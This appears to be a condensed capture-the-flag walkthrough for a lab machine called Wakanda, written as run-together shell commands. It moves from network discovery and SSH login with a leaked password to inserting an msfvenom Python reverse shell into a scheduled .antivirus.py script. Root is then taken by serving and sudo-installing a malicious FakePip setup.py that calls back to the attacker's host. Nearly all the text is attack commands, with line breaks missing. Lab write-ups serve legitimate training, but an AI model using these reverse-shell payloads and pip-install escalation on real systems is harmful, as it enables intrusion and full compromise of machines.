netdiscover -r <Kali IP>nmap -p0-65535 <WaKanda IP>nano /etc/hosts then add the following line wakanda.local <wakanda IP>http://wakanda.local:
| User: mamadou | Password: Niamey4Ever227!!! |
Generate msfvenom payload to generate a shell (for flag 2):
msfvenom -p cmd/unix/reverse_python lhost=<Kali IP> lport=<any port> R
ssh mamadou@wakanda.local -p 3333 β> yes β> enter: Niamey4Ever227!!!import pty; pty.spawn('/bin/bash')cat flag1.txtcd /srvls -anano .antivirus.py β> β#β old exec β> then insert msfvenom payloadnc -nlvp <lport> β> wait patientlyid & bash -icd /home β> ls β> cd /devops β> cat flag2.txtgit clone https://github.com/0x00-0x00/FakePip.gitcd FakePipnano setup.py β> change RHOST=<Kali IP>, also notice lport=443python -m SimpleHTTPServer 80wget http://<Kali IP>:<Port (80)>/setup.pysudo pip install . --upgrade --force-reinstallnc -lvp <lport (443)>cd /root β> ls β> cat root.txt